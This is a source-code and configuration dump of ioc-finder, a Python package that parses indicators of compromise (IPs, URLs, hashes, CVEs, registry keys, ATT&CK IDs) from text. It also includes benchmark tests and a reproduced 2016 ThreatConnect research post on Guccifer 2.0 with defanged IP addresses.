 77 | hexadectet = Word(hexnums, min=1, max=4)
 78 | ipv6_address_full = ipv6_word_start + Combine((hexadectet + ":") * 7 + hexadectet)
 79 | 
 80 | # the condition on the end of this grammar is designed to make sure that any shortened ipv6 addresses have '::' in them
 81 | ipv6_address_shortened = Combine(OneOrMore(Or([hexadectet + Word(":"), Word(":")])) + hexadectet).addCondition(
 82 |     lambda tokens: tokens[0].count("::") > 0
 83 | )
 84 | 
 85 | ipv6_address = (
 86 |     Or([ipv6_address_full, ipv6_address_shortened]).addCondition(lambda tokens: tokens[0].count(":") > 1)
 87 |     + ipv6_word_end
 88 | )
 89 | 
 90 | complete_email_comment = Regex(r"\([a-zA-Z0-9]+\)")
 91 | # the complete_email_local_part grammar ignores the fact that characters like <<<(),:;<>@[\] >>>
 92 | # are possible in a quoted complete_email_local_part
 93 | # (and the double-quotes and backslash should be preceded by a backslash)
 94 | complete_email_local_part = Combine(
 95 |     Optional(complete_email_comment)("email_address_start_comment")
 96 |     + OneOrMore(MatchFirst([Word(alphanums + "!#$%&'*+-/=?^_`{|}~." + '"'), CaselessLiteral("\\@")]))
 97 |     + Optional(complete_email_comment)("email_address_end_comment")
 98 | )
 99 | complete_email_address = Combine(
100 |     complete_email_local_part("email_address_local_part")
101 |     + "@"
102 |     + Or([domain_name, "[" + ipv4_address + "]", "[IPv6:" + ipv6_address + "]"])("email_address_domain")
103 | )
104 | 
105 | email_local_part = Word(alphanums, bodyChars=alphanums + "+-_.").set_parse_action(pyparsing_common.downcase_tokens)
106 | email_address = alphanum_word_start + Combine(
107 |     email_local_part("email_address_local_part")
108 |     + "@"
109 |     + Or([domain_name, "[" + ipv4_address + "]", "[IPv6:" + ipv6_address + "]"])("email_address_domain")
110 | )
111 | 
112 | url_scheme = one_of(schemes, caseless=True)
113 | port = Word(":", nums, min=2)
114 | url_authority = Combine(Or([email_address, domain_name, ipv4_address, ipv6_address]) + Optional(port)("port"))
115 | # The url_path_word characters are taken from https://www.ietf.org/rfc/rfc3986.txt...
116 | # (of particular interest is "Appendix A.  Collected ABNF for URI")
117 | # Although the ":" character is not valid in url paths,
118 | # some urls are written with the ":" unencoded so we include it below
119 | url_path_word = Word(alphanums + "-._~!$&'()*+,;=:%")
120 | url_path = Combine(OneOrMore(MatchFirst([url_path_word, Literal("/")])))
121 | url_query = Word(printables, excludeChars="#\"']")
122 | url_fragment = Word(printables, excludeChars="?\"']")
123 | url = alphanum_word_start + Combine(
124 |     url_scheme("url_scheme")
125 |     + "://"
126 |     + url_authority("url_authority")
127 |     + Optional(Combine("/" + Optional(url_path)))("url_path")
128 |     + (Optional(Combine("?" + url_query)("url_query")) & Optional(Combine("#" + url_fragment)("url_fragment")))
129 | )
130 | scheme_less_url = alphanum_word_start + Or(
131 |     [
132 |         url,
133 |         Combine(
134 |             Combine(url_authority("url_authority") + Combine("/" + Optional(url_path))("url_path"))
135 |             + (Optional(Combine("?" + url_query)("url_query")) & Optional(Combine("#" + url_fragment)("url_fragment")))
136 |         ),
137 |     ]
138 | )
139 | 
140 | # this allows for matching file hashes preceeded with an 'x' or 'X'...
141 | # see https://github.com/fhightower/ioc-finder/issues/41
142 | file_hash_word_start = WordStart(wordChars=alphanums.replace("x", "").replace("X", ""))
143 | md5 = (
144 |     file_hash_word_start
145 |     + Word(hexnums, exact=32).set_parse_action(pyparsing_common.downcase_tokens)
146 |     + alphanum_word_end
147 | )
148 | imphash = Combine(
149 |     Or([CaselessLiteral("imphash"), CaselessLiteral("import hash")])
150 |     + Optional(Word(printables, excludeChars=alphanums))
151 |     + md5("hash"),
152 |     joinString=" ",
153 |     adjacent=False,
154 | )
155 | sha1 = (
156 |     file_hash_word_start
157 |     + Word(hexnums, exact=40).set_parse_action(pyparsing_common.downcase_tokens)
158 |     + alphanum_word_end
159 | )
160 | sha256 = (
161 |     file_hash_word_start
162 |     + Word(hexnums, exact=64).set_parse_action(pyparsing_common.downcase_tokens)
163 |     + alphanum_word_end
164 | )
165 | authentihash = Combine(
166 |     CaselessLiteral("authentihash") + Optional(Word(printables, excludeChars=alphanums)) + sha256("hash"),
167 |     joinString=" ",
168 |     adjacent=False,
169 | )
170 | sha512 = (
171 |     file_hash_word_start
172 |     + Word(hexnums, exact=128).set_parse_action(pyparsing_common.downcase_tokens)
173 |     + alphanum_word_end
174 | )
175 | 
176 | year = Word("12") + Word(nums, exact=3)
177 | cve = (
178 |     alphanum_word_start
179 |     + Combine(
180 |         CaselessLiteral("cve").set_parse_action(replace_with("CVE"))
181 |         + Word("- ").set_parse_action(replace_with("-"))
182 |         + year("year")
183 |         + Word("-")
184 |         + Word(nums, min=4)("cve_id")
185 |     )
186 |     + alphanum_word_end
187 | )
188 | 
189 | asn = (
190 |     alphanum_word_start
191 |     + Combine(
192 |         Or(
193 |             [
194 |                 Literal("AS") + Optional(Word("N ")).set_parse_action(replace_with("N")),
195 |                 Literal("as").set_parse_action(replace_with("ASN")),
196 |                 (Literal("asn") + Optional(" ")).set_parse_action(replace_with("ASN")),
197 |             ]
198 |         )
199 |         + Word(nums)("as_number")
200 |     )
201 |     + alphanum_word_end
202 | )
203 | 
204 | ipv4_cidr = (
205 |     alphanum_word_start
206 |     + Combine(ipv4_address("cidr_address") + "/" + Word(nums, max=2)("cidr_bit_range"))
207 |     + alphanum_word_end
208 | )
209 | 
210 | root_key_list = [
211 |     "HKEY_LOCAL_MACHINE",
212 |     "HKLM",
213 |     "HKEY_CURRENT_CONFIG",
214 |     "HKCC",
215 |     "HKEY_CLASSES_ROOT",
216 |     "HKCR",
217 |     "HKEY_CURRENT_USER",
218 |     "HKCU",
219 |     "HKEY_USERS",
220 |     "HKU",
221 |     "HKEY_PERFORMANCE_DATA",
222 |     "HKEY_DYN_DATA",
223 | ]
224 | root_key = one_of(root_key_list)
225 | 
226 | 
227 | def hasMultipleConsecutiveSpaces(string):
228 |     """Return True if the given string has multiple, consecutive spaces."""
229 |     return re.match("  +", string)
230 | 
231 | 
232 | def hasBothOrNeitherAngleBrackets(string):
233 |     """Make sure a string either has both '<' and '>' or neither of those angle brackets."""
234 |     left_angle_bracket_in_string = "<" in string
235 |     right_angle_bracket_in_string = ">" in string
236 | 
237 |     # if the string has both brackets...
238 |     if left_angle_bracket_in_string and right_angle_bracket_in_string:
239 |         return True
240 |     # if the string has only one bracket...
241 |     elif left_angle_bracket_in_string or right_angle_bracket_in_string:
242 |         return False
243 |     # if the string has neither of the brackets...
244 |     else:
245 |         return True
246 | 
247 | 
248 | registry_key_subpath_section = Combine(
249 |     Word("\\")
250 |     + Optional(Word("<"))
251 |     + Word(alphanums)
252 |     + ZeroOrMore(
253 |         # registry key paths may contain a file extension which requires that we capture registry
254 |         # key path sections with a period (e.g. `notepad.exe`)
255 |         Optional(Word(".", max=1))
256 |         # the registry key path section can contain any alphanum text (including spaces) as long as the text is not
257 |         # one of the registry key path root keys and as long as there are not multiple, consecutive spaces
258 |         + Word(alphanums + " ").addCondition(
259 |             lambda tokens: tokens[0].strip() not in root_key_list and not hasMultipleConsecutiveSpaces(tokens[0])
260 |         )
261 |     )
262 |     + Optional(Word(">"))
263 | ).addCondition(lambda tokens: hasBothOrNeitherAngleBrackets(tokens[0]))
264 | registry_key_subpath = OneOrMore(registry_key_subpath_section)
265 | registry_key_path = (
266 |     alphanum_word_start
267 |     + Combine(
268 |         Optional("<").set_parse_action(replace_with(""))
269 |         + root_key("registry_key_root")
270 |         + Optional(">").set_parse_action(replace_with(""))
271 |         + registry_key_subpath("registry_key_subpath")
272 |     )
273 |     + alphanum_word_end
274 | )
275 | 
276 | # see https://support.google.com/adsense/answer/2923881?hl=en
277 | google_adsense_publisher_id = (
278 |     alphanum_word_start
279 |     # we use `Or([Literal("pub-")...` instead of something like `CaselessLiteral("pub-")` b/c...
280 |     # we only want to parse "pub" when it is all upper or lowercased (not "pUb" or other, similar variations)
281 |     + Combine(one_of("pub- PUB-") + Word(nums, exact=16)).set_parse_action(pyparsing_common.downcase_tokens)
282 |     + alphanum_word_end
283 | )
284 | 
285 | # see https://support.google.com/analytics/answer/7372977?hl=en
286 | google_analytics_tracker_id = (
287 |     alphanum_word_start
288 |     + Combine(
289 |         # we use `Or([Literal("ua-")...` instead of something like `CaselessLiteral("ua-")` b/c...
290 |         # we only want to parse "ua" when it is all upper or lowercased (not "uA" or other, similar variations)
291 |         one_of("ua- UA-")
292 |         + Word(nums, min=6)("account_number")
293 |         + "-"
294 |         + Word(nums)("property_number")
295 |     ).set_parse_action(pyparsing_common.upcase_tokens)
296 |     + alphanum_word_end
297 | )
298 | 
299 | # see https://en.bitcoin.it/wiki/Address
300 | # (and https://github.com/bitcoin/bips/blob/master/bip-0173.mediawiki#segwit-address-format for Bech32 addresses)
301 | bitcoin_address = (
302 |     alphanum_word_start
303 |     + MatchFirst(
304 |         [
305 |             Regex(r"1[a-zA-Z0-9]{25,34}"),
306 |             Regex(r"3[a-zA-Z0-9]{25,34}"),
307 |             Regex(r"bc1[a-zA-Z0-9]{11,71}"),
308 |         ]
309 |     )
310 |     + alphanum_word_end
311 | )
312 | 
313 | monero_address = alphanum_word_start + Regex("4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}") + alphanum_word_end
314 | 
315 | # see https://github.com/fhightower/ioc-finder/issues/18
316 | xmpp_address = alphanum_word_start + Combine(
317 |     email_local_part("email_address_local_part") + "@" + domain_name("jabber_address_domain")
318 | ).addCondition(lambda tokens: "jabber" in tokens[0].split("@")[-1] or "xmpp" in tokens[0].split("@")[-1])
319 | 
320 | # the mac address grammar was developed from https://en.wikipedia.org/wiki/MAC_address#Notational_conventions
321 | # handles xx:xx:xx:xx:xx:xx or xx-xx-xx-xx-xx-xx
322 | mac_address_16_bit_section = Combine((Word(hexnums, exact=2) + one_of("- :")) * 5 + Word(hexnums, exact=2))
323 | # handles xxxx.xxxx.xxxx
324 | mac_address_32_bit_section = Combine((Word(hexnums, exact=4) + ".") * 2 + Word(hexnums, exact=4))
325 | mac_address_word_start = WordStart(wordChars=alphanums + ":-.")
326 | mac_address_word_end = WordEnd(wordChars=alphanums + ":-.")
327 | mac_address = (
328 |     mac_address_word_start + MatchFirst([mac_address_16_bit_section, mac_address_32_bit_section]) + mac_address_word_end
329 | )
330 | 
331 | # the structure of an ssdeep hash is: chunksize:chunk:double_chunk
332 | # we add a condition to the ssdeep grammar to make sure that the second section of the grammar
333 | # (the chunk) is at least as big if not bigger than the third section (the double_chunk)
334 | ssdeep = alphanum_word_start + Combine(
335 |     Word(nums) + ":" + Word(alphanums + "/+", min=3) + ":" + Word(alphanums + "/+", min=3)
336 | ).addCondition(lambda tokens: len(tokens[0].split(":")[1]) >= len(tokens[0].split(":")[2]))
337 | 
338 | user_agent_platform_version = Regex(r"[0-9]+(\.[0-9]*)*")
339 | user_agent_start = Combine(Regex(r"[Mm]ozilla/") + user_agent_platform_version)
340 | user_agent_details = Regex(r"\(.+?\)")
341 | user_agent_platform = Combine(
342 |     alphanum_word_start
343 |     + Regex(r"[a-zA-Z]{2,}/?").addCondition(lambda tokens: tokens[0].lower().strip("/") != "mozilla")
344 |     + Optional(user_agent_platform_version)
345 | )
346 | user_agent = Combine(
347 |     user_agent_start + user_agent_details + ZeroOrMore(user_agent_platform + Optional(user_agent_details)),
348 |     joinString=" ",
349 |     adjacent=False,
350 | )
351 | 
352 | # https://github.com/fhightower/ioc-finder/issues/13
353 | file_ending = Word(alphas, max=5)
354 | windows_file_path = alphanum_word_start + Combine(
355 |     Char(alphanums) + ":" + Word(printables + " ", exclude_chars=".") + "." + file_ending
356 | )
357 | 
358 | # we need to add '/' and '~' to the alphanum_word_start so that the grammar will match words starting with '/' and '~'
359 | # we add ':' to the alphanum_word_start because we want to avoid parsing urls are file paths
360 | # (e.g. "//twitter.com" from "https://twitter.com/")
361 | unix_file_path_wordstart = copy.deepcopy(alphanum_word_start)
362 | unix_file_path_wordstart.wordChars.add(":")
363 | unix_file_path_wordstart.wordChars.add("/")
364 | unix_file_path_wordstart.wordChars.add("~")
365 | 
366 | unix_file_path = unix_file_path_wordstart + Combine(
367 |     one_of("~ /") + Word(printables + " ", exclude_chars=".") + "." + file_ending
368 | ).addCondition(lambda tokens: "//" not in tokens[0])
369 | file_path = Or([windows_file_path, unix_file_path]) + alphanum_word_end
370 | 
371 | # be aware that the phone_number grammar assumes that the text being sent to it has been reversed
372 | phone_number_connector = Word(" .-", max=3)
373 | phone_number_format_1 = Combine(
374 |     Word(nums, exact=4)
375 |     + phone_number_connector
376 |     + Word(nums, exact=3)
377 |     + Optional(phone_number_connector + Optional(")") + Word(nums) + Optional("("))
378 | )
379 | 
380 | phone_number = Or([phone_number_format_1])
381 | 
382 | attack_sub_technique = Literal(".") + Word(nums, exact=3)
383 | pre_attack_tactics_grammar = (
384 |     alphanum_word_start
385 |     + Or([CaselessLiteral(i) for i in pre_attack_tactics]).set_parse_action(pyparsing_common.upcase_tokens)
386 |     + alphanum_word_end
387 | )
388 | pre_attack_techniques_grammar = (
389 |     alphanum_word_start
390 |     + Combine(
391 |         one_of(pre_attack_techniques, caseless=True).set_parse_action(pyparsing_common.upcase_tokens)
392 |         + Optional(attack_sub_technique)
393 |     )
394 |     + alphanum_word_end
395 | )
396 | 
397 | enterprise_attack_mitigations_grammar = (
398 |     alphanum_word_start + one_of(enterprise_attack_mitigations, caseless=True) + alphanum_word_end
399 | )
400 | enterprise_attack_tactics_grammar = (
401 |     alphanum_word_start
402 |     + one_of(enterprise_attack_tactics, caseless=True).set_parse_action(pyparsing_common.upcase_tokens)
403 |     + alphanum_word_end
404 | )
405 | enterprise_attack_techniques_grammar = (
406 |     alphanum_word_start
407 |     + Combine(
408 |         one_of(enterprise_attack_techniques, caseless=True).set_parse_action(pyparsing_common.upcase_tokens)
409 |         + Optional(attack_sub_technique)
410 |     )
411 |     + alphanum_word_end
412 | )
413 | 
414 | mobile_attack_mitigations_grammar = (
415 |     alphanum_word_start + one_of(mobile_attack_mitigations, caseless=True) + alphanum_word_end
416 | )
417 | mobile_attack_tactics_grammar = (
418 |     alphanum_word_start
419 |     + one_of(mobile_attack_tactics, caseless=True).set_parse_action(pyparsing_common.upcase_tokens)
420 |     + alphanum_word_end
421 | )
422 | mobile_attack_techniques_grammar = (
423 |     alphanum_word_start
424 |     + Combine(
425 |         one_of(mobile_attack_techniques, caseless=True).set_parse_action(pyparsing_common.upcase_tokens)
426 |         + Optional(attack_sub_technique)
427 |     )
428 |     + alphanum_word_end
429 | )
430 | 
431 | tlp_colors = one_of("red amber green white", caseless=True)
432 | 
433 | tlp_label = Combine(
434 |     CaselessLiteral("tlp")
435 |     + Or([Literal(":"), Literal("-"), Literal(" "), Empty()]).set_parse_action(lambda x: ":")
436 |     + tlp_colors
437 | ).set_parse_action(pyparsing_common.upcase_tokens)
438 | 


--------------------------------------------------------------------------------
/mkdocs.yml:
--------------------------------------------------------------------------------
 1 | site_name: Indicator of Compromise Finder Docs
 2 | site_url: ""
 3 | repo_url: https://github.com/fhightower/ioc-finder
 4 | repo_name: ioc-finder
 5 | theme:
 6 |   name: material
 7 |   custom_dir: docs/overrides
 8 |   palette:
 9 |     - media: "(prefers-color-scheme: light)"
10 |       scheme: default
11 |       toggle:
12 |         icon: material/lightbulb-outline
13 |         name: Switch to dark mode
14 |       primary: deep orange
15 |       accent: deep orange
16 |     - media: "(prefers-color-scheme: dark)"
17 |       scheme: slate
18 |       toggle:
19 |         icon: material/lightbulb
20 |         name: Switch to light mode
21 |       primary: deep orange
22 |       accent: deep orange
23 |   font: false
24 |   icon:
25 |     logo: material/magnify
26 |   features:
27 |     - navigation.instant
28 |     - navigation.top
29 |     - header.autohide
30 |     - toc.integrate
31 | markdown_extensions:
32 |   - pymdownx.highlight
33 |   - pymdownx.superfences
34 |   - attr_list
35 |   - admonition
36 |   - pymdownx.details
37 |   - meta
38 |   - toc:
39 |       permalink: true
40 | nav:
41 |     - Home: index.md
42 |     - Quick Start: quick-start.md
43 |     - Developer Docs: development.md
44 | 


--------------------------------------------------------------------------------
/mypy.ini:
--------------------------------------------------------------------------------
1 | [mypy]
2 | ignore_missing_imports = True
3 | 


--------------------------------------------------------------------------------
/pyproject.toml:
--------------------------------------------------------------------------------
 1 | [tool.black]
 2 | line-length = 120
 3 | 
 4 | [tool.isort]
 5 | line_length = 120
 6 | include_trailing_comma = true
 7 | 
 8 | [tool.pylint."MESSAGES CONTROL"]
 9 | max-line-length = 120
10 | disable = "C0114, R1705, C0103"
11 | 
12 | [tool.pytest.ini_options]
13 | addopts = "-n auto -vv --cov=. --cov-report term-missing --cov-fail-under 95"
14 | python_files = "tests/test_*.py"
15 | 
16 | 


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | click>=7.1.2,<9.0
2 | ioc-fanger>=4.2.1,<4.3
3 | pyparsing>=3.0,<=3.1.1
4 | d8s-strings>=0.5.0,<1.0
5 | 


--------------------------------------------------------------------------------
/requirements_dev.txt:
--------------------------------------------------------------------------------
 1 | black==23.3.0
 2 | bump2version>=1.0.1,<2.0
 3 | codecov>=2.1.11,<3.0
 4 | d8s-file-system>=0.10.0,<1.0
 5 | d8s-lists>=0.8.0,<1.0
 6 | flake8-cognitive-complexity>=0.1.0,<1.0
 7 | flake8>=4.0,<7.0
 8 | hypothesis>=6.14.1,<7.0
 9 | ipython>7.0,<9.0
10 | mypy>=0.910,<2.0
11 | pylint>=2.9.6,<3.0
12 | pytest-benchmark>=3.4.1,<5.0
13 | pytest-cov>=2.12.1,<5.0
14 | pytest>=7.0.1,<8.0
15 | pytest-xdist>=2.5.0,<3.0
16 | requests>=2.25.1,<3.0
17 | mkdocs-material>=8.0.1,<10.0
18 | 


--------------------------------------------------------------------------------
/setup.cfg:
--------------------------------------------------------------------------------
 1 | [bumpversion]
 2 | current_version = 7.3.0
 3 | commit = True
 4 | tag = True
 5 | 
 6 | [bumpversion:file:setup.py]
 7 | search = version="{current_version}"
 8 | replace = version="{new_version}"
 9 | 
10 | [bumpversion:file:ioc_finder/__init__.py]
11 | search = __version__ = "{current_version}"
12 | replace = __version__ = "{new_version}"
13 | 
14 | [bdist_wheel]
15 | universal = 1
16 | 
17 | [flake8]
18 | exclude = docs
19 | max-line-length = 120
20 | per-file-ignores = 
21 | 	ioc_finder/__init__.py:F403,F401
22 | 	tests/*:E501
23 | 
24 | [pep8]
25 | max-line-length = 120
26 | 


--------------------------------------------------------------------------------
/setup.py:
--------------------------------------------------------------------------------
 1 | from setuptools import setup, find_packages
 2 | 
 3 | with open("README.md") as readme_file:
 4 |     readme = readme_file.read()
 5 | 
 6 | with open("requirements.txt") as requirements_file:
 7 |     requirements = requirements_file.read().splitlines()
 8 | 
 9 | setup(
10 |     name="ioc_finder",
11 |     version="7.3.0",
12 |     description="Python package for finding and parsing indicators of compromise from text.",
13 |     entry_points={"console_scripts": ["ioc-finder=ioc_finder.ioc_finder:cli_find_iocs"]},
14 |     long_description=readme,
15 |     long_description_content_type="text/markdown",
16 |     author="Floyd Hightower",
17 |     author_email="",
18 |     url="https://github.com/fhightower/ioc-finder",
19 |     project_urls={
20 |         "Changelog": "https://github.com/fhightower/ioc-finder/blob/main/CHANGELOG.md",
21 |         "Documentation": "https://hightower.space/ioc-finder/",
22 |         "Source": "https://github.com/fhightower/ioc-finder",
23 |         "Issues": "https://github.com/fhightower/ioc-finder/issues",
24 |         "Sponsor": "https://github.com/sponsors/fhightower",
25 |     },
26 |     packages=find_packages(exclude=("tests", "docs")),
27 |     include_package_data=True,
28 |     install_requires=requirements,
29 |     license="GNU Lesser General Public License v3",
30 |     zip_safe=True,
31 |     keywords="iocs,indicators of compromise,parsing,finding,searching,threat intelligence,malware,threat hunting,observables,domains,domain names,asns,cidr,cidr ranges,ips,ip addresses,urls,email addresses,md5,sha1,sha256,google ads,cve,file paths",
32 |     classifiers=[
33 |         "Development Status :: 5 - Production/Stable",
34 |         "Intended Audience :: Developers",
35 |         "License :: OSI Approved :: GNU Lesser General Public License v3 or later (LGPLv3+)",
36 |         "Natural Language :: English",
37 |         "Programming Language :: Python :: 3",
38 |         "Programming Language :: Python :: 3.7",
39 |         "Programming Language :: Python :: 3.8",
40 |         "Programming Language :: Python :: 3.9",
41 |         "Programming Language :: Python :: 3.10",
42 |     ],
43 |     test_suite="tests",
44 | )
45 | 


--------------------------------------------------------------------------------
/tests/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fhightower/ioc-finder/06ae551de766e542ecf2d200271162866cbf0f73/tests/__init__.py


--------------------------------------------------------------------------------
/tests/benchmarks.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | from pathlib import Path
 3 | 
 4 | from pytest import mark
 5 | 
 6 | from ioc_finder import find_iocs, parse_urls
 7 | 
 8 | SHORT_TEXT = """abc.py bar.com example.com foo.com swissjabber.de https://example.com/test%20page/foo.com/bingo.php?q=bar.com foo@swissjabber.de me@example.com me@example.com 1.1.1.1/0 imphash 18ddf28a71089acdbab5038f58044c0a authentihash 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4 1.1.1.1 2001:0db8:0000:0000:0000:ff00:0042:8329 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 12288:QYV6MorX7qzuC3QHO9FQVHPF51jgcSj2EtPo/V7I6R+Lqaw8i6hG0:vBXu9HGaVHh4Po/VU6RkqaQ6F 0000:0000:ff00 2001:0db8:0000 ASN123 CVE-2022-1234 HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows pub-1234567891234567 UA-000000-1 imphash 18ddf28a71089acdbab5038f58044c0a 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy 496aKKdqF1xQSSEzw7wNrkZkDUsCD5cSmNCfVhVgEps52WERBcLDGzdF5UugmFoHMm9xRJdewvK2TFfAJNwEV25rTcVF5Vp AA-F2-C9-A6-B3-4F Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1) TLP:RED ~/foo/bar/abc.py enterprise pre_attack pre_attack M1036 M1015 TA0012 T1329"""
 9 | LONG_TEXT = Path(os.path.join(os.path.dirname(__file__), "./data/long-article-1.txt")).read_text(encoding="utf8")
10 | TEXTS = (SHORT_TEXT, LONG_TEXT)
11 | 
12 | 
13 | def _run(f):
14 |     for text in TEXTS:
15 |         f(text)
16 | 
17 | 
18 | def test_benchmarks(benchmark):
19 |     benchmark(_run, find_iocs)
20 | 
21 | 
22 | def test_parse_urls(benchmark):
23 |     benchmark(_run, parse_urls)
24 | 


--------------------------------------------------------------------------------
/tests/data/long-article-1.txt:
--------------------------------------------------------------------------------
  1 | # Source: https://threatconnect.com/blog/guccifer-2-all-roads-lead-russia/
  2 | 
  3 | 07.26.16
  4 | Guccifer 2.0: All Roads Lead to Russia
  5 | IN THREAT RESEARCH | BY THREATCONNECT RESEARCH TEAM
  6 | BG All Roads Lead to Russia
  7 | Guccifer 2.0: All Roads Lead to Russia
  8 | Update 07/26/2016  4:00pm EDT
  9 | Joe Uchill with The Hill, who has previously covered Guccifer 2.0 and the Wikileaks DNC data dump, has provided us with redacted information on his communications with Guccifer 2.0 that has raised our confidence in our current assessments and hypotheses.
 10 | 
 11 | Check out Joe’s story here.
 12 | 
 13 |  
 14 | 
 15 | ThreatConnect follows Guccifer 2.0’s French breadcrumbs back to a Russian VPN Service
 16 | Read the full series of ThreatConnect posts following the DNC Breach: “Rebooting Watergate: Tapping into the Democratic National Committee“, “Shiny Object? Guccifer 2.0 and the DNC Breach“, “What’s in a Name Server?“, “Guccifer 2.0: the Man, the Myth, the Legend?“, “Guccifer 2.0: All Roads Lead to Russia“, “FANCY BEAR Has an (IT) Itch that They Can’t Scratch“, “Does a BEAR Leak in the Woods?“, “Russian Cyber Operations on Steroids“, and “Can a BEAR Fit Down a Rabbit Hole?“.
 17 | 
 18 | In our initial Guccifer 2.0 analysis, ThreatConnect highlighted technical and non-technical inconsistencies in the purported DNC hacker’s story as well as a curious theme of French “connections” surrounding various Guccifer 2.0 interactions with the media. We called out these connections as they overlapped, albeit minimally, with FANCY BEAR infrastructure identified in CrowdStrike’s DNC report.
 19 | 
 20 | Now, after further investigation, we can confirm that Guccifer 2.0 is using the Russia-based Elite VPN service to communicate and leak documents directly with the media. We reached this conclusion by analyzing the infrastructure associated with an email exchange with Guccifer 2.0 shared with ThreatConnect by Vocativ’s Senior Privacy and Security reporter Kevin Collier. This discovery strengthens our ongoing assessment that Guccifer 2.0 is a Russian propaganda effort and not an independent actor.
 21 | 
 22 | Analyzing the Headers from Guccifer 2.0 Emails
 23 | On June 21, 2016, TheSmokingGun reported they communicated with Guccifer 2.0 via a French AOL account. We examined the French language settings observed in Guccifer 2.0’s Twitter metadata as well as a pattern of Twitter follows that suggested Guccifer 2.0’s account was created from a French IP address. We hypothesized at the time that Guccifer 2.0 might be using French infrastructure to interact with the media.
 24 | 
 25 | WHITE PAPER: 6 EASY WAYS TO ADVANCE YOUR CYBERSECURITY PROGRAM WHEN YOU HAVE A SMALL TEAM
 26 | As a result of our continuing analysis series that focused on FANCY BEAR infrastructure, Guccifer 2.0’s background, and his claims, media sources who have interacted with Guccifer 2.0 via Twitter and email shared additional data with us. One of which is Vocativ’s Kevin Collier, details of his story can be found here.
 27 | 
 28 | Using the ThreatConnect Email Analyze feature we were able to analyze an email exchange Kevin had with Guccifer 2.0, identifying details of the adversary (Guccifer 2.0’s) email account and infrastructure while also redacting sensitive details of Kevin’s email and infrastructure. Analyzing the metadata revealed several additional investigative leads.
 29 | 
 30 | During the Email Import process ThreatConnect analyzes an email message header and highlights indicators of interest with a color code that reveals if the indicators already exist within the platform. This helps overburdened eyes or greenhorn analysts quickly understand what they are seeing. At the same time ThreatConnect excludes legitimate or benign details that are not of value to our investigation.
 31 | 
 32 | ThreatConnect Research Guccifer 2.0: All Roads Lead to Russia 1
 33 | As we can see here within ThreatConnect, Guccifer 2.0’s AOL email message reveals the originating IP address as 95.130.15[.]34 (DigiCube SaS – France). This is the IP address of the host which authenticated into AOL’s web user interface and sent the email. We can also tell this IP was not spoofed because the metadata was added by AOL when sent from within their infrastructure with appropriate DomainKeys Identified Mail (DKIM) configurations.
 34 | 
 35 | The fact that Guccifer 2.0 is indeed leveraging a French AOL account stands out from a technical perspective. Very few hackers with Guccifer 2.0’s self-acclaimed skills would use a free webmail service that would give away a useful indicator like the originating IP address. Most seasoned security professionals will be familiar with email providers that are more likely to cooperate with law enforcement and how much metadata a provider might reveal about their users. Taken together with inconsistencies in Guccifer 2.0’s remarks that make his technical claims sound implausible, this detail makes us think the individual(s) operating the AOL account are not really hackers or even that technically savvy. Instead, propagandist or public relations individuals who are interacting with journalists.
 36 | 
 37 | Drilling into Guccifer 2.0 Infrastructure: Picture of a VPN Starts to Emerge
 38 | As we focused in on IP Address 95.130.15[.]34 we queried public sources such as Shodan as well as Censys to discover what services might be enabled on this host. The goal of this was to better understand if this infrastructure is owned and operated, leased or co-opted by Guccifer 2.0 and how the infrastructure might be used to create space between an originating “source” network and investigators, or curious journalists.
 39 | 
 40 | ThreatConnect Research Guccifer 2.0: All Roads Lead to Russia 2According to Shodan, OpenSSH (TCP/22), DNS (UDP/53) and Point-to-Point Tunneling Protocol (PPTP) (TCP/1723) services have been enabled on this host. Secure shell (SSH) and point-to-point tunneling protocol services strongly suggest a VPN and/or a proxy, both of which would allow the Guccifer 2.0 persona to put distance between his originating network and those with whom he is communicating.
 41 | 
 42 | The SSH fingerprint can be used as an identifier, linking other IP addresses that use the same SSH encryption key. The SSH fingerprint for 95.130.15[.]34 (DigiCube SaS – France) is Fingerprint: 80:19:eb:c8:80:a1:c6:ea:ea:37:ba:c0:26:c6:7f:61. Searching for other servers that share this fingerprint at the time of writing, we discovered six additional IP Addresses over the course of our research (95.130.9[.]198; 95.130.15[.]36; 95.130.15[.]37; 95.130.15[.]38; 95.130.15[.]40;  95.130.15[.]41).
 43 | 
 44 | Each IP address falls within the 95.130.8.0/21 network range. This range is assigned to Digicube SAS, a French hosting provider which is assigned the Autonomous System AS196689. An IP address is analogous to the apartment numbers in an apartment building. The entire building is owned and operated by AS196689, but certain IP addresses may be let out to other companies and organizations.
 45 | 
 46 | ThreatConnect Research Guccifer 2.0: All Roads Lead to Russia fingerprint
 47 | The fact that Guccifer 2.0 would use a proxy service is not surprising, and our first stop was to check with various TOR proxy registration sites. None of these seven IP addresses are part of reported TOR infrastructure from what we were able to uncover.
 48 | 
 49 | These seven IP addresses are all connected by the same SSH fingerprint, so another interesting line of inquiry is to look at those neighbors to see if we can deduce anything useful about the Guccifer 2.0 IP address. Using ThreatConnect’s Farsight Security Passive DNS integration, we see one of our IP addresses of interest – 95.130.9[.]198 – has previously hosted the domain fr1.vpn-service[.]us since February 2015. The naming convention is consistent with our working hypothesis that Guccifer 2.0 is leveraging French-based VPN infrastructure to communicate with journalists.
 50 | 
 51 | ThreatConnect Research Guccifer 2.0: All Roads Lead to Russia 3
 52 | Next, we turned to our friends at DomainTools to examine the registrant information behind the fr1.vpn-service[.]us domain.  We quickly found more evidence to support our previous research that Guccifer 2.0 maintains Russian origins.
 53 | 
 54 | ThreatConnect Research Guccifer 2.0: All Roads Lead to Russia 2004 VPN
